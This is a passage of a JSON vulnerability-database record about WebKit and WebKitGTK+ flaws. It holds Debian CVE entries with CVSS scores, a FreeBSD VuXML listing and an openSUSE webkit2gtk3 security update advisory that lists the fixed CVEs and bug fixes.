"MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7161"], "modified": "2018-04-03T06:29:00", "id": "DEBIANCVE:CVE-2017-7161", "href": "https://security-tracker.debian.org/tracker/CVE-2017-7161", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-06T18:06:21", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-27T17:08:00", "type": "debiancve", "title": "CVE-2017-7160", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7160"], "modified": "2017-12-27T17:08:00", "id": "DEBIANCVE:CVE-2017-7160", "href": "https://security-tracker.debian.org/tracker/CVE-2017-7160", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-06T18:06:21", "description": "An issue was discovered in certain Apple products. iOS before 11.2.5 is affected. macOS before 10.13.3 is affected. Safari before 11.0.3 is affected. tvOS before 11.2.5 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-04-03T06:29:00", "type": "debiancve", "title": "CVE-2018-4089", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4089"], "modified": "2018-04-03T06:29:00", "id": "DEBIANCVE:CVE-2018-4089", "href": "https://security-tracker.debian.org/tracker/CVE-2018-4089", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-06T18:06:21", "description": "An issue was discovered in certain Apple products. iOS before 11.2.5 is affected. macOS before 10.13.3 is affected. Safari before 11.0.3 is affected. iCloud before 7.3 on Windows is affected. iTunes before 12.7.3 on Windows is affected. tvOS before 11.2.5 is affected. watchOS before 4.2.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-04-03T06:29:00", "type": "debiancve", "title": "CVE-2018-4088", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4088"], "modified": "2018-04-03T06:29:00", "id": "DEBIANCVE:CVE-2018-4088", "href": "https://security-tracker.debian.org/tracker/CVE-2018-4088", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-06T18:06:21", "description": "An issue was discovered in certain Apple products. iOS before 11.2.5 is affected. macOS before 10.13.3 is affected. Safari before 11.0.3 is affected. iCloud before 7.3 on Windows is affected. iTunes before 12.7.3 on Windows is affected. tvOS before 11.2.5 is affected. watchOS before 4.2.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-04-03T06:29:00", "type": "debiancve", "title": "CVE-2018-4096", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4096"], "modified": "2018-04-03T06:29:00", "id": "DEBIANCVE:CVE-2018-4096", "href": "https://security-tracker.debian.org/tracker/CVE-2018-4096", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:31", "description": "\n\nThe WebKit team reports many vulnerabilities.\nPlease reference the CVE/URL list for details.\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-10-18T00:00:00", "type": "freebsd", "title": "webkit2-gtk3 -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13783", "CVE-2017-13784", "CVE-2017-13785", "CVE-2017-13788", "CVE-2017-13791", "CVE-2017-13792", "CVE-2017-13794", "CVE-2017-13795", "CVE-2017-13796", "CVE-2017-13798", "CVE-2017-13802", "CVE-2017-13803", "CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-13884", "CVE-2017-13885", "CVE-2017-5715", "CVE-2017-5753", "CVE-2017-7087", "CVE-2017-7089", "CVE-2017-7090", "CVE-2017-7091", "CVE-2017-7092", "CVE-2017-7093", "CVE-2017-7095", "CVE-2017-7096", "CVE-2017-7098", "CVE-2017-7100", "CVE-2017-7102", "CVE-2017-7104", "CVE-2017-7107", "CVE-2017-7109", "CVE-2017-7111", "CVE-2017-7117", "CVE-2017-7120", "CVE-2017-7153", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160", "CVE-2017-7161", "CVE-2017-7165", "CVE-2018-4088", "CVE-2018-4089", "CVE-2018-4096"], "modified": "2018-03-28T00:00:00", "id": "1CE95BC7-3278-11E8-B527-00012E582166", "href": "https://vuxml.freebsd.org/freebsd/1ce95bc7-3278-11e8-b527-00012e582166.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2021-06-08T18:43:18", "description": "This update for webkit2gtk3 to version 2.20.3 fixes the issues:\n\n The following security vulnerabilities were addressed:\n\n - CVE-2018-12911: Fixed an off-by-one error in xdg_mime_get_simple_globs\n (boo#1101999)\n - CVE-2017-13884: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n - CVE-2017-13885: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n - CVE-2017-7153: An unspecified issue allowed remote attackers to spoof\n user-interface information (about whether the entire content is derived\n from a valid TLS session) via a crafted web site that sends a 401\n Unauthorized redirect (bsc#1077535).\n - CVE-2017-7160: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n - CVE-2017-7161: An unspecified issue allowed remote attackers to execute\n arbitrary code via special characters that trigger command injection\n (bsc#1075775, bsc#1077535).\n - CVE-2017-7165: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n - CVE-2018-4088: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n - CVE-2018-4096: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n - CVE-2018-4200: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site that triggers a\n WebCore::jsElementScrollHeightGetter use-after-free (bsc#1092280).\n - CVE-2018-4204: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1092279).\n - CVE-2018-4101: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4113: An issue in the JavaScriptCore function in the "WebKit"\n component allowed attackers to trigger an assertion failure by\n leveraging improper array indexing (bsc#1088182)\n - CVE-2018-4114: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182)\n - CVE-2018-4117: An unspecified issue allowed remote attackers to bypass\n the Same Origin Policy and obtain sensitive information via a crafted\n web site (bsc#1088182, bsc#1102530).\n - CVE-2018-4118: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182)\n - CVE-2018-4119: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182)\n - CVE-2018-4120: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4121: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1092278).\n - CVE-2018-4122: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4125: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4127: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4128: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4129: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4146: An unspecified issue allowed attackers to cause a denial\n of service (memory corruption) via a crafted web site (bsc#1088182).\n - CVE-2018-4161: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4162: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4163: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4165: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4190: An unspecified issue allowed remote attackers to obtain\n sensitive credential information that is transmitted during a CSS\n mask-image fetch (bsc#1097693)\n - CVE-2018-4199: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (buffer overflow and\n application crash) via a crafted web site (bsc#1097693)\n - CVE-2018-4218: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site that triggers an\n @generatorState use-after-free (bsc#1097693)\n - CVE-2018-4222: An unspecified issue allowed remote attackers to execute\n arbitrary code via a crafted web site that leverages a\n getWasmBufferFromValue\n out-of-bounds read during WebAssembly compilation (bsc#1097693)\n - CVE-2018-4232: An unspecified issue allowed remote attackers to\n overwrite cookies via a crafted web site (bsc#1097693)\n - CVE-2018-4233: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1097693)\n - CVE-2018-4246: An unspecified issue allowed remote attackers to execute\n arbitrary code via a crafted web site that leverages type confusion\n (bsc#1104169)\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL and\n webkitFaviconDatabaseSetIconURLForPageURL mishandled an unset pageURL,\n leading to an application crash (bsc#1095611)\n - CVE-2018-4133: A Safari cross-site scripting (XSS) vulnerability allowed\n remote attackers to inject arbitrary web script or HTML via a crafted\n URL (bsc#1088182).\n - CVE-2018-11713: The libsoup network backend of WebKit unexpectedly\n failed to use system proxy settings for WebSocket connections. As a\n result, users could be deanonymized by crafted web sites via a WebSocket\n connection (bsc#1096060).\n - CVE-2018-11712: The libsoup network backend of WebKit failed to perform\n TLS certificate verification for WebSocket connections (bsc#1096061).\n\n\n This update for webkit2gtk3 fixes the following issues:\n\n - Fixed a crash when atk_object_ref_state_set is called on an AtkObject\n that's being destroyed (bsc#1088932).\n - Fixed crash when using Wayland with QXL/virtio (bsc#1079512)\n - Disable Gigacage if mmap fails to allocate in Linux.\n - Add user agent quirk for paypal website.\n - Properly detect compiler flags, needed libs, and fallbacks for usage of\n 64-bit atomic operations.\n - Fix a network process crash when trying to get cookies of about:blank\n page.\n - Fix UI process crash when closing the window under Wayland.\n - Fix several crashes and rendering issues.\n - Do TLS error checking on GTlsConnection::accept-certificate to finish\n the load earlier in case of errors.\n - Properly close the connection to the nested wayland compositor in the\n Web Process.\n - Avoid painting backing stores for zero-opacity layers.\n - Fix downloads started by context menu failing in some websites due to\n missing user agent HTTP header.\n - Fix video unpause when GStreamerGL is disabled.\n - Fix several GObject introspection annotations.\n - Update user agent quiks to fix Outlook.com and Chase.com.\n - Fix several crashes and rendering issues.\n - Improve error message when Gigacage cannot allocate virtual memory.\n - Add missing WebKitWebProcessEnumTypes.h to webkit-web-extension.h.\n - Improve web process memory monitor thresholds.\n - Fix a web process crash when the web view is created and destroyed\n quickly.\n - Fix a network process crash when load is cancelled while searching for\n stored HTTP auth credentials.\n - Fix the build when ENABLE_VIDEO, ENABLE_WEB_AUDIO and ENABLE_XSLT are\n disabled.\n - New API to retrieve and delete cookies with WebKitCookieManager.\n - New web process API to detect when form is submitted via JavaScript.\n - Several improvements and fixes in the touch/gestures support.\n - Support for the \u00e2\u0080\u009csystem\u00e2\u0080\u009d CSS font family.\n - Complex text rendering improvements and fixes.\n - More complete and spec compliant WebDriver implementation.\n - Ensure DNS prefetching cannot be re-enabled if disabled by settings.\n - Fix seek sometimes not working.\n - Fix rendering of emojis that were using the wrong scale factor in some\n cases.\n - Fix rendering of combining enclosed keycap.\n - Fix rendering scale of some layers in HiDPI.\n - Fix a crash in Wayland when closing the web view.\n - Fix crashes upower crashes when running inside a chroot or on systems\n with broken dbus/upower.\n - Fix memory leaks in GStreamer media backend when using GStreamer 1.14.\n - Fix several crashes and rendering issues.\n - Add ENABLE_ADDRESS_SANITIZER to make it easier to build with asan\n support.\n - Fix a crash a under Wayland when using mesa software rasterization.\n - Make fullscreen video work again.\n - Fix handling of missing GStreamer elements.\n - Fix rendering when webm video is played twice.\n - Fix kinetic scrolling sometimes jumping around.\n - Fix build with ICU configured without collation support.\n - WebSockets use system proxy settings now (requires libsoup 2.61.90).\n - Show the context menu on long-press gesture.\n - Add support for Shift + mouse scroll to scroll horizontally.\n - Fix zoom gesture to actually zoom instead of changing the page scale.\n - Implement support for Graphics ARIA roles.\n - Make sleep inhibitors work under Flatpak.\n - Add get element CSS value command to WebDriver.\n - Fix a crash aftter a swipe gesture.\n - Fix several crashes and rendering issues.\n - Fix crashes due to duplicated symbols in libjavascriptcoregtk and\n libwebkit2gtk.\n - Fix parsing of timeout values in WebDriver.\n - Implement get timeouts command in WebDriver.\n - Fix deadlock in GStreamer video sink during shutdown when accelerated\n compositing is disabled.\n - Fix several crashes and rendering issues.\n - Add web process API to detect when form is submitted via JavaScript.\n - Add new API to replace webkit_form_submission_request_get_text_fields()\n that is now deprecated.\n - Add WebKitWebView::web-process-terminated signal and deprecate\n web-process-crashed.\n - Fix rendering issues when editing text areas.\n - Use FastMalloc based GstAllocator for GStreamer.\n - Fix web process crash at startup in bmalloc.\n - Fix several memory leaks in GStreamer media backend.\n - WebKitWebDriver process no longer links to libjavascriptcoregtk.\n - Fix several crashes and rendering issues.\n - Add new API to add, retrieve and delete cookies via WebKitCookieManager.\n - Add functions to WebSettings to convert font sizes between points and\n pixels.\n - Ensure cookie operations take effect when they happen before a web\n process has been spawned.\n - Automatically adjust font size when GtkSettings:gtk-xft-dpi changes.\n - Add initial resource load statistics support.\n - Add API to expose availability of certain editing commands in\n WebKitEditorState.\n - Add API to query whether a WebKitNavigationAction is a redirect\n or not.\n - Improve complex text rendering.\n - Add support for the "system" CSS font family.\n - Disable USE_GSTREAMER_GL\n\n This update was imported from the SUSE:SLE-12-SP2:Update update project.\n\n", "cvss3": {}, "published": "2018-10-26T00:11:58", "type": "suse", "title": "Security update for webkit2gtk3 (moderate)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2018-4119", "CVE-2017-7161", "CVE-2018-4129", "CVE-2018-4165", "CVE-2018-4146", "CVE-2017-7165", "CVE-2018-4101", "CVE-2018-4128", "CVE-2018-4199", "CVE-2018-4163", "CVE-2018-12911", "CVE-2018-4120", "CVE-2018-4118", "CVE-2018-4114", "CVE-2018-4190", "CVE-2018-11646", "CVE-2018-11713", "CVE-2018-11712", "CVE-2018-4133", "CVE-2018-4162", "CVE-2017-7153", "CVE-2018-4125", "CVE-2017-7160", "CVE-2018-4233", "CVE-2018-4113", "CVE-2018-4222", "CVE-2017-13884", "CVE-2018-4127", "CVE-2018-4088", "CVE-2018-4204", "CVE-2018-4096", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4117", "CVE-2018-4161", "CVE-2017-13885", "CVE-2018-4232", "CVE-2018-4122", "CVE-2018-4200", "CVE-2018-4121"], "modified": "2018-10-26T00:11:58", "id": "OPENSUSE-SU-2018:3473-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-10/msg00071.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
WebKitGTK+: Multiple Vulnerabilities
